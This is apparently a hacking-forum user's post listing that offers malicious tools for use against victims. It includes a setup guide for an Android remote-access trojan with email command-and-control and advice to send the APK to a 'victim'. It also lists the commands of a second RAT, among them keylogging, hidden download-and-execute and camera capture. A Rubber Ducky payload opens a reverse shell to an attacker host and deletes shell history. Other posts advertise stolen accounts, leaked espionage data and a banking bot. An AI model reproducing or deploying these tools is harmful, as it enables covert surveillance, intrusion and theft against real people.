dEEpEst

Administrators

Everything posted by dEEpEst

  1. TheDoctor says: This is an Android application, which runs a background service on boot to receive commands. Sounds simple, is simple.

    Features

      • Background service, which is able to receive commands
      • Service is running on boot
      • C&C via E-Mail (And here we got the first point, which should get discussed… See below)
      • Communication is encrypted with XOR (Yeeha, directly got the second discussion point)
      • A solid error-handling, that our Client doesn’t crash due to connection errors or invalid input
      • Remote Administration via Windows application (Should run under Linux with Mono too… Maybe someone here wants to test it?)

    Commands

    At the moment I only included two POC commands to show how commands in general can be added. Of course these ones are pretty boring, but you can easily extend the RAT with your own ones! And I’ll add more useful commands in the next days/weeks.

      • Show a Toast
      • Open a webpage

    Why do you use E-Mail for C&C?

    Mmh… I didn’t want to use Reverse TCP and have recently read about E-Mail C&C, which I wanted to try out. At the moment I’ve got no problems with this decision, but you should add FTP support, when you want to send files or big data back to your Server.

    XOR-encryption? Are you fuckin’ serious, man?

    Of course that’s not meant for real protection. I just wanted to have something to hide my communication from “normal” people. I’ll add AES + Some sort of origin-validation, which takes us to the next point:

    WARNING

    At the moment anyone can hijack the connection and send commands to our Client, who knows the Server’s Mail address (Password’s not needed; keyword is spoofing), the Client’s Mail address and the XOR key! I don’t think you want anyone to send weird messages to your Girlfriend, after you infected her with the RAT, so I’ll fix this soon.

    Setup

    Here comes the newbie friendly guide on how to build an APK out of the source code, setup the required Mail addresses and use the Control Server for sending commands!
    I use Win10 64-Bit with Visual Studio 2015. Other OSs and IDEs could work, but are not supported! Ok, now after I’ve created a bad mood for the Linux and Mac users here, we can go further on. (Little side note: I would have used Linux, but sadly Xamarin is only available for Windows and MacOS… And programming in Java is out of discussion)

    Client

    First you have to install Visual Studio with Xamarin. Don’t know how? See here. Now download the project from my Github page. Run Visual Studio and open the project: Select now the Project file: Now you only have to open the Globals file from the project Argus - RAT. Not Argus - RAT ~ Server! You should see the Globals.cs file now in the middle of your screen. Here’s the only place you have to edit. If you don’t know what you’re doing, don’t touch other files! It’s not needed.

    Ok, as you see you’ll need two Mail addresses, which you have to create on your own. As an example I use [Hidden Content], because they don’t check anything, so you can easily create the addresses anonymously, but I don’t know whether you understand the page, without a knowledge of German. Of course you can use Gmail too, but they always ask me for validation via phone call… Anyway, the important part is that you may have to allow POP & IMAP access to your account in the Mail settings of your provider! [Hidden Content] needs it and I think others need it too! Just google around, if you don’t know. If you use another provider and not [Hidden Content], you’ll have to change the Mail Server settings in Globals.cs too! And another time, just google around for POP & SMTP address + ports and I’m sure you’ll find it.
    Ok, after you’re done fill in your details in Globals.cs:

        //-\\-//-\\-//-\\-//-\\-//- MAIL STUFF -\\-//-\\-//-\\-//-\\-//-\\
        // MAIL SERVER Only needs to be changed, when you use another provider
        public String MailServerPopAddress = "pop3.web.de";
        public String MailServerSmtpAddress = "smtp.web.de";
        public int MailServerSmtpPort = 587;
        public int MailServerPort = 995;
        // CLIENT
        public String ClientMailAddress = "Client@web.de"; // The address of the client
        public String ClientMailPass = "p455w0rd"; // The password of your Client's mail address
        // SERVER
        public String ServerMailAddress = "Server@web.de"; // The address of your Server
        // ENCRYPTION
        public String XorKey = "testKeyOfDoom"; // The key you use for encryption. Please use something hard, because you won't have to fill it in any forms multiple times. You'll just have to fill it in, when you add the Client to your Server (See later) and then you can just forget it!

    After you changed the relevant values check them twice! You won’t get a second chance. When the .APK is sent to your victim and it doesn’t work, it’ll get interesting to tell him/her that he/she has to install your “new” version of the program, just because you filled in the wrong credentials…

    Sure that you’re ready? Then we come to the building process… First, change the mode to “Release”: Then select Tools -> Android -> Publish Android App. Now you should get a screen like this one, if you do it the first time: Just fill in whatever you like to create new keys for signing and continue. On the next screen choose the path to save it to and the name. Ready? Click Publish! Now it takes some time… When it’s finished, you got a fully working Android Remote Administration Tool! Just send the .APK to your victim and when he/she installs and opens it you’re in!

    Server

    The setup of our Server is much easier.
    Either open the Argus - RAT ~ Server project in Visual Studio and run it by pressing F5 or search the Argus - RAT ~ Server directory manually and run the executable in the Release directory. That’s up to you. Anyway, you’ll get this: Yes, not that great stuff… As I said above, I’ve only added two POC commands, but I’ll explain later how you can add your very own functions! For now just click Add Client.

    Explanation

      • Name: The name you want to call your Client. It’s just a description and does not depend on anything, so you can choose whatever you want.
      • Client’s Mail address: The address you chose for your Client.
      • Server’s Mail address: The address you’ll use for the Server.
      • Server’s Mail password: Don’t know what should be here? Please just go to [Hidden Content] or any other kids place…
      • Encryption Key: The key you used in the Globals.cs file! Upper and lower case is respected!

    And that was it. Now you can select the Client via ComboBox and send him commands:

    Developer?

    You are a developer and want to extend the RAT’s features? Then you’re exactly the kind of person I appreciate here. Ok, to make it easier for you I’ll explain every step you have to make, when you want to add your function! I hope you’ve already opened the project in Visual Studio. If not, do so. The important files are:

      • Argus - RAT: MainService.cs, Commands.cs
      • Argus - RAT ~ Server: Commands.cs

    And you should add your own entry in the Form. That’s up to you, how you want to do it, so I don’t explain this step. Every file is open? Great, let’s go on.

    Think about it… What do you want as a new function? What arguments are needed? Which name do you want to give the command? These questions have to be answered before you continue. As an example I’ll use the Toast command I already added.
      • Name: Toast
      • Argument(s): Text

    Server (Commands.cs)

    In the Commands.cs file you only have to add a function like this one:

        /// <summary>
        /// Sends a Toast to Client
        /// </summary>
        /// <param name="text">The Toast to show</param>
        public bool SendToast(String text)
        {
            String body = "Toast:" + text;
            return SendMail(body);
        }

    Please put it below the /* Commands*/ comment, so that everything’s in the right order.

    Explanation

    The only thing I have to explain is the String body = "Toast:" + text;. The "Toast:" is used to identify the command when it arrives at your client. Just change Toast with the name you’ve chosen for your function and the arguments behind with the ones you need. If you got any questions feel free to ask me.

    Client

    In the MainService.cs you just have to add an else if to the handleCommand() function. Example:

        else if (cmd == "toast")
            Commands.ShowWebsite(value);

    Make sure to use lowercase even when you used uppercase at Server-side. The command will be made lowercase, when it arrives at the client! value is everything behind the colon. And now the setup is finished and you can start writing your own function! Open Commands.cs and add your Code. For example:

        /// <summary>
        /// Shows the given text as toast
        /// </summary>
        /// <param name="text">Text to toast out</param>
        public static void ShowToast(String text)
        {
            Application.SynchronizationContext.Post(_ =>
            {
                Toast.MakeText(Android.App.Application.Context, text, ToastLength.Long).Show();
            }, null);
        }

    Now you’ve made your own function within about 5 minutes!

    Conclusion

    Wow, it got longer than I thought. I hope you’re enjoying this and are interested in extending the features. I’ll add different improvements in the next days, so make sure to check it out. For everyone who wants to test out his own features or just wants to try the RAT without using any smartphone, I can recommend Bluestacks!
    It is annoying as CAPTCHAs, but very helpful, if you just want to easily test your apps in a nearly real environment.

    |-TheDoctor-|
  3. dEEpEst

    BTC.CoM Checker

  4. dEEpEst

    Instagram by FuseFire

  5. dEEpEst

    Netflix GC Generator

  7. dEEpEst

    FREE NORD VPN 

  8. Besides source code for the above tools, which I posted recently, Iranian hackers also leaked data taken from victims that had been collected in some of APT34's backend command-and-control (C&C) servers. Data was taken from both government agencies, but also from private companies including APT34 operations, IP address and other operational data.
  9. APT34 (Iranian cyber-espionage) [2019]

    In an incident reminiscent of the Shadow Brokers leak that exposed the NSA's hacking tools, someone has now published similar hacking tools belonging to one of Iran's elite cyber-espionage units.

    Dumps Hacked Data: This is in the PRIV8 area, otherwise you can access purchase the free pass for life here
  10. Swapnil Pathak is a cybersecurity enthusiast and a student with broad interests in computer systems, IoT and software security.
  11. Saefko Attack Systems the most advanced RAT-BOT-AGENT ever created

    This is "a multi protocol multi operating system" remote administration tool. This is the first system to use three protocols establishing all time communication. There are four main things this design provides that no other system provides:

      • Unlimited number of machines to control.
      • Extreme reliability.
      • Android and Windows control at the same time.
      • No port forwarding.
      • No mysql.

    This project was designed to replace all RAT/BOTS that are made to control remote machines. The problem with all current RATS/BOTS is that they are unreliable and limited: you can't in 99.9% of the time have more than 100 machines or victims due to self flooding, self flooding meaning when the client connects to the server directly, "when the rat connects to the attacker pc through TCP". When the number of connected clients increases this acts as a flood attack, so you will be limited to some low number and you will end up with a laggy unreliable connection to the target machines. That's from the side of TCP rats. The other side is the http bots, that use a remote server containing some php scripts and a mysql server. This design can handle an unlimited number of machines in theory, but the problem with this design is that you do not have a direct connection to the machine, so you are limited to http tasks and this does not give you much control. So that was just a quick short overview of some of the extreme problems that RATS/BOTS are facing with current techs. In Saefko Attack Systems "SAS", combining both of these types of connections and adding IRC Protocol to the mix, you will end up with an extremely reliable connection to the target machine. SAS will handle millions of connections with direct TCP communications established through IRC networks any time any place all weather.
    Fast Setup Youtube : Main Windows Public HTTP Tasks Windows Build Android Build Command And Control Sections Android Command And Control Sections Android IRC Commands

    ANDROID COMMANDS

      • [msg] Show toast message.
      • [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'.
      • [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'.
      • [vistpage] Visit a webpage in visible mode eg : 'vistpage [Hidden Content]'.
      • [hvistpage] Visit a webpage in hidden mode eg : 'hvistpage [Hidden Content]'.
      • [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
      • [ping] Ping the agent machine to check if still active.
      • [location] Get geo location information based on 'ipinfo.com'.
      • [flashon] Turn the device flash on.
      • [flashoff] Turn the device flash on.
      • [wakeup] Turn device screen on.
      • [screenshot] Take a screenshot from the target machine.

    GENERAL COMMANDS

      • [clear] Clear the terminal.
      • [opacity] Change the transparency of the terminal eg : 'opacity 0.4'.
      • [myip] Show your public ip address that is currently in use.
      • [showtcpport] Show the public port used for TCP communications.
      • [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'.
      • [ping] Ping the agent machine to check if still active.
      • [info] Tells the agent to identify its machine and return short information about it.
      • [CTRL + C] CTRL + C to cancel any previous commands.
      • [flashoff] Turn the device flash on.
      • [cleanup] Close all windows that were created by this control unit.
      • [retcp] Order the TCP agent to reconnect, this command is used in case the TCP connection is disconnected.
      • [exit] Close the current agent window.

    Android TCP Commands Android Private HTTP Tasks

    HTTP Tasks Types

      • Download And execute
      • Show Message Box
      • Visit Website
      • Shell Commands

    Now Windows Command And Control Windows IRC Commands

    WINDOWS COMMANDS

      • [pwd] Show current directory.
      • [screenshot] Take a screenshot from the target machine.
      • [opencd] Open cd rom.
      • [closecd] Close cd rom.
      • [ping] Ping the agent machine to check if still active.
      • [camlist] Get a list of available camera devices.
      • [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
      • [location] Get geo location information based on 'ipinfo.com'.
      • [opencd] Open cd rom.
      • [keylogs] Get agent saved keylogs through HTTP drop point.
      • [shell] Run shell commands.
      • [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'.
      • [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'.
      • [vistpage] Visit a webpage in visible mode eg : 'vistpage [Hidden Content]'.
      • [hvistpage] Visit a webpage in hidden mode eg : 'hvistpage [Hidden Content]'.
      • [uninstall] Uninstall the agent completely from the target machine.

    GENERAL COMMANDS

      • [clear] Clear the terminal.
      • [opacity] Change the transparency of the terminal eg : 'opacity 0.4'.
      • [myip] Show your public ip address that is currently in use.
      • [showtcpport] Show the public port used for TCP communications.
      • [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'.
      • [ping] Ping the agent machine to check if still active.
      • [info] Tells the agent to identify its machine and return short information about it.
      • [CTRL + C] CTRL + C to cancel any previous commands.
      • [flashoff] Turn the device flash on.
      • [cleanup] Close all windows that were created by this control unit.
      • [retcp] Order the TCP agent to reconnect, this command is used in case the TCP connection is disconnected.
      • [exit] Close the current agent window.

    Windows TCP Commands Windows Private HTTP Tasks

    HTTP Tasks Types

      • Download And execute
      • Show Message Box
      • Visit Website
      • Shell Commands
  12. dEEpEst

    X6 4Shared Accounts

  14. Learn Photoshop and photography by designing levitation digital art! In this course, you will learn industry-standard editing techniques in Photoshop and learn the fundamentals and beyond for effective photography, all while having fun producing digital art. You'll learn from our four photoshoots for levitation digital art: a vintage studio, a sand dunes scene with smoke, a university architecture scene, and a rundown building with sparklers. Each of the four sections has two projects to follow along with, after learning from the photoshoots. This course comes with 16 JPEG images to produce the levitation effect using a variety of techniques, 36 PSD Photoshop files to learn from, and helpful handouts, including a PDF on common Photoshop shortcuts, a PDF on Photoshop file types, and a 21-page PDF on photography fundamentals. After learning from the four photoshoots and multiple follow-along Photoshop projects in each section, you put what you learned into practice by producing a final project of levitation digital art with your own photos. Check out the sample videos for more information on the course and our bios for information on our qualifications! See you in the course! Song in promotional video is called Heartwarming by Kevin MacLeod (CC). Who is this course for? Anyone new to photography and Photoshop or those who are not new but want to learn more about digital art techniques and principles. Anyone who wants to create amazing levitation digital art composites using photography and Photoshop!
  16. Script To Start Your Own Movie Site OVOO 2.5.7 - Movie & Video Streaming CMS with Unlimited TV-Series
  17. dEEpEst

    OSX Backdoor

    OSX-screened-backdoor Rubber Ducky payload for semi persistent backdooring using screen. REM Title: OSX Backdoor REM Author: Fer Gonzalez (armi3) REM Making enough time for keyboard recognition window to open before starting. DELAY 1500 GUI SPACE DELAY 900 STRING Terminal DELAY 500 ENTER DELAY 1000 DELAY 700 ENTER DELAY 300 REM Setting a screen for persistence. STRING screen -t "sneaky-boy" DELAY 500 ENTER DELAY 500 ENTER DELAY 500 REM Sending reverse interactive shell to attacker's 1337 netcat listener. STRING bash -i >& /dev/tcp/attackerip/1337 0>&1 DELAY 500 ENTER DELAY 500 REM Detaching screen session and cleaning up the crime scene. CONTROL a DELAY 300 STRING d DELAY 500 STRING rm ~/.bash_history DELAY 500 ENTER DELAY 300 GUI q
  18. dEEpEst

    Anubis 2.5 Android Bot Banking

  19. dEEpEst

    X4 SCRIBD

  20. dEEpEst

    X4 SONYLIVE

  21. dEEpEst

    X4 GRAMMARLY
